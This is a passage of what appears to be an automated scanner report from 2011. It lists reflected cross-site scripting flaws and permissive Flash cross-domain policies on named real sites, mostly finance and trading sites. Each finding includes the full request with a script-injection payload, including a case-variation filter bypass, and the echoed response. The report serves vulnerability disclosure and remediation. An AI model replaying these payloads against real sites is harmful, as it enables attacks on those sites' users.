Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:23 GMT
Server: Apache
Content-Length: 28177
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/images5b373"><a b=c>5dc4835aa60/btn_continuetowebsite.png" method="POST">
...[SNIP]...

2.19. http://www.interactivebrokers.com/mobile/index.php/images/btn_continuetowebsite.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/btn_continuetowebsite.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0dac"><a%20b%3dc>49956ecfea3 was submitted in the REST URL parameter 4. This input was echoed as d0dac"><a b=c>49956ecfea3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/images/btn_continuetowebsite.pngd0dac"><a%20b%3dc>49956ecfea3 HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:30 GMT
Server: Apache
Content-Length: 28177
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/images/btn_continuetowebsite.pngd0dac"><a b=c>49956ecfea3" method="POST">
...[SNIP]...

2.20. http://www.interactivebrokers.com/mobile/index.php/images/btn_submit.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/btn_submit.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e550c"><a%20b%3dc>76544989d21 was submitted in the REST URL parameter 3. This input was echoed as e550c"><a b=c>76544989d21 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/imagese550c"><a%20b%3dc>76544989d21/btn_submit.png HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:23 GMT
Server: Apache
Content-Length: 28166
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/imagese550c"><a b=c>76544989d21/btn_submit.png" method="POST">
...[SNIP]...

2.21. http://www.interactivebrokers.com/mobile/index.php/images/btn_submit.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/btn_submit.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df40"><a%20b%3dc>45310a5bfce was submitted in the REST URL parameter 4. This input was echoed as 3df40"><a b=c>45310a5bfce in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/images/btn_submit.png3df40"><a%20b%3dc>45310a5bfce HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:30 GMT
Server: Apache
Content-Length: 28166
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/images/btn_submit.png3df40"><a b=c>45310a5bfce" method="POST">
...[SNIP]...

2.22. http://www.interactivebrokers.com/mobile/index.php/images/request_app_iblogo.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/request_app_iblogo.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84869"><a%20b%3dc>8dd8570e10 was submitted in the REST URL parameter 3. This input was echoed as 84869"><a b=c>8dd8570e10 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/images84869"><a%20b%3dc>8dd8570e10/request_app_iblogo.png HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:23 GMT
Server: Apache
Content-Length: 28173
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/images84869"><a b=c>8dd8570e10/request_app_iblogo.png" method="POST">
...[SNIP]...

2.23. http://www.interactivebrokers.com/mobile/index.php/images/request_app_iblogo.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/request_app_iblogo.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26054"><a%20b%3dc>b5857bc8409 was submitted in the REST URL parameter 4. This input was echoed as 26054"><a b=c>b5857bc8409 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/images/request_app_iblogo.png26054"><a%20b%3dc>b5857bc8409 HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:30 GMT
Server: Apache
Content-Length: 28174
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/images/request_app_iblogo.png26054"><a b=c>b5857bc8409" method="POST">
...[SNIP]...

2.24. http://www.interactivebrokers.com/mobile/index.php/m.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/m.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e953b"><a%20b%3dc>24c8fdce66a was submitted in the REST URL parameter 3. This input was echoed as e953b"><a b=c>24c8fdce66a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/m.csse953b"><a%20b%3dc>24c8fdce66a HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:21 GMT
Server: Apache
Content-Length: 28150
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/m.csse953b"><a b=c>24c8fdce66a" method="POST">
...[SNIP]...

2.25. https://www.interactivebrokers.com/sso/Login [forwardTo parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /sso/Login

Issue detail

The value of the forwardTo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4554"><a%20b%3dc>858eb6fd52c was submitted in the forwardTo parameter. This input was echoed as d4554"><a b=c>858eb6fd52c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sso/Login?forwardTo=1d4554"><a%20b%3dc>858eb6fd52c HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:49:15 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: XYZAB_AM.LOGIN=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: XYZAB=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: URL_PARAM=forwardTo=1d4554a20b3dc858eb6fd52c; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: JSESSIONID=08546737D95F44C0653B32581EDE3A9E.wwwsso3; Path=/sso; Secure
Content-Length: 13290
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"/>
   <link hre
...[SNIP]...
<input type="hidden" name="action" value="1d4554"><a b=c>858eb6fd52c">
...[SNIP]...

2.26. http://www.invest-store.com/cgi-bin/commoditybooks-bin/category.cgi [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.invest-store.com
Path:   /cgi-bin/commoditybooks-bin/category.cgi

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3488b"><script>alert(1)</script>8d048951567 was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/commoditybooks-bin/category.cgi?page=bargainbuys3488b"><script>alert(1)</script>8d048951567 HTTP/1.1
Host: www.invest-store.com
Proxy-Connection: keep-alive
Referer: http://www.invest-store.com/cgi-bin/commoditybooks-bin/home.cgi?division=books
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=50.23.123.106-20252902820223; FBSBSeen=1; SaneID=50.23.123.106-20252902820223

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:00:37 GMT
Server: Microsoft-IIS/6.0
Expires: Thu, 08 Sep 2011 20:30:37 GMT
Date: Thu, 08 Sep 2011 20:00:37 GMT
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<TITLE>Commodity Books online store</TITLE>
<SCRIPT LANGUAGE="JavaScript">
<!-- hide from old browsers
function S
...[SNIP]...
<input type="hidden" name="page" value="bargainbuys3488b"><script>alert(1)</script>8d048951567">
...[SNIP]...

2.27. http://www.invest-store.com/cgi-bin/commoditybooks-bin/home.cgi [division parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.invest-store.com
Path:   /cgi-bin/commoditybooks-bin/home.cgi

Issue detail

The value of the division request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743e0"><script>alert(1)</script>93f8ff19375 was submitted in the division parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/commoditybooks-bin/home.cgi?division=books743e0"><script>alert(1)</script>93f8ff19375 HTTP/1.1
Host: www.invest-store.com
Proxy-Connection: keep-alive
Referer: http://www.invest-store.com/commoditybooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=50.23.123.106-20252902820223

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:00:29 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<TITLE>Commodity Books online store</TITLE>
<SCRIPT LANGUAGE="JavaScript">
<!-- hide from old browsers
function S
...[SNIP]...
<a HREF="help.cgi?division=books743e0"><script>alert(1)</script>93f8ff19375">
...[SNIP]...

2.28. http://www2.daytrade4less.com/livesupport/image.php [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.daytrade4less.com
Path:   /livesupport/image.php

Issue detail

The value of the l request parameter is copied into the HTML document as plain text between tags. The payload 75280<script>alert(1)</script>2fa378bba35 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /livesupport/image.php?l=admin75280<script>alert(1)</script>2fa378bba35&x=1&deptid=0&pagex=http%3A//www.globalfutures.com/index.asp%3Frefid%3Dgoogleaef&unique=1315527938667&refer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dfutures+trading&text= HTTP/1.1
Host: www2.daytrade4less.com
Proxy-Connection: keep-alive
Referer: http://www.globalfutures.com/index.asp?refid=googleaef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:36:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 139
Connection: close
Content-Type: text/html; charset=UTF-8

<font color="#FF0000">Config error: reason: admin75280<script>alert(1)</script>2fa378bba35 config not found! Exiting... [image.php]</font>

2.29. http://www2.daytrade4less.com/livesupport/js/status_image.php [base_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.daytrade4less.com
Path:   /livesupport/js/status_image.php

Issue detail

The value of the base_url request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e3875%20a%3db1797d1b1ec2 was submitted in the base_url parameter. This input was echoed as e3875 a=b1797d1b1ec2 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /livesupport/js/status_image.php?base_url=http://www2.daytrade4less.com/livesupporte3875%20a%3db1797d1b1ec2&l=admin&x=1&deptid=0& HTTP/1.1
Host: www2.daytrade4less.com
Proxy-Connection: keep-alive
Referer: http://www.globalfutures.com/index.asp?refid=googleaef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:36:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8710

<!--
// please do not use " or ' characters in the click_for_live_support variable or it
// will produce errors and PHP Live! will not function properly
var click_for_live_support = "Click for Live Su
...[SNIP]...
<img src=\"http://www2.daytrade4less.com/livesupporte3875 a=b1797d1b1ec2/images/initiate_close.gif\" width=10 height=10 border=0>
...[SNIP]...

2.30. http://www.pfgbest.com/toolkit/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pfgbest.com
Path:   /toolkit/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 540d0"><script>alert(1)</script>80305f47048 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /toolkit/ HTTP/1.1
Host: www.pfgbest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=540d0"><script>alert(1)</script>80305f47048

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 08 Sep 2011 19:47:23 GMT
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Length: 74506
Content-Type: text/html
Cache-control: private


<head>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en
...[SNIP]...
<input type="hidden" name="HTTP_REFERER" value="http://www.google.com/search?hl=en&q=540d0"><script>alert(1)</script>80305f47048" />
...[SNIP]...

2.31. http://finance.yahoo.com/news/Retail-gasoline-prices-up-apf-2916275523.html [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/Retail-gasoline-prices-up-apf-2916275523.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0458<ScRiPt>alert(1)</ScRiPt>27c46b4b333 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /d0458<ScRiPt>alert(1)</ScRiPt>27c46b4b333/Retail-gasoline-prices-up-apf-2916275523.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Redirect
Date: Thu, 08 Sep 2011 19:47:06 GMT
Connection: close
Server: YTS/1.20.7
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Location: http://download.finance.yahoo.com/d0458<ScRiPt>alert(1)</ScRiPt>27c46b4b333/Retail-gasoline-prices-up-apf-2916275523.html
Content-Length: 311

<HEAD><TITLE>Redirect</TITLE></HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<FONT FACE="Helvetica,Arial"><B>
"<em>http://download.finance.yahoo.com/d0458<ScRiPt>alert(1)</ScRiPt>27c46b4b333/Retail-gasoline-prices-up-apf-2916275523.html</em>
...[SNIP]...

3. Flash cross-domain policy  previous  next
There are 33 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://360.sorensonmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://360.sorensonmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: 360.sorensonmedia.com
Proxy-Connection: keep-alive
Referer: http://static.cdn.360.sorensonmedia.com/1/flash/flowplayer-3.2.2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=7399391306302201EC8ED885C1DF301EBE94B9D3266A90D7C75A424550F489FD629C2C3ACAAE7C766E443396D53A4DBE988DB00D0CFDBC4B96568304D3BBF7D375BA252957

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Range: bytes 0-316/317
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:24:51 GMT
ETag: "1285808463.0-317"
Last-Modified: Thu, 30 Sep 2010 01:01:03 GMT
Server: nginx/0.5.33
Content-Length: 317
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

3.2. http://cdn-static.viddler.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-static.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn-static.viddler.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:54:06 GMT
ETag: "80713937-4d-476833f70e800"
Expires: Fri, 07 Sep 2012 19:54:06 GMT
Last-Modified: Thu, 22 Oct 2009 10:06:24 GMT
Server: ECAcc (sjo/52D4)
X-Cache: HIT
Content-Length: 77

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.3. http://cdn-thumbs.viddler.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-thumbs.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn-thumbs.viddler.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:54:06 GMT
ETag: "780699-4d-48bbdf11afc40"
Last-Modified: Mon, 19 Jul 2010 13:56:57 GMT
Server: ECAcc (sjo/52D4)
X-Cache: HIT
Content-Length: 77

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.4. http://cdn.static.viddler.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.static.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

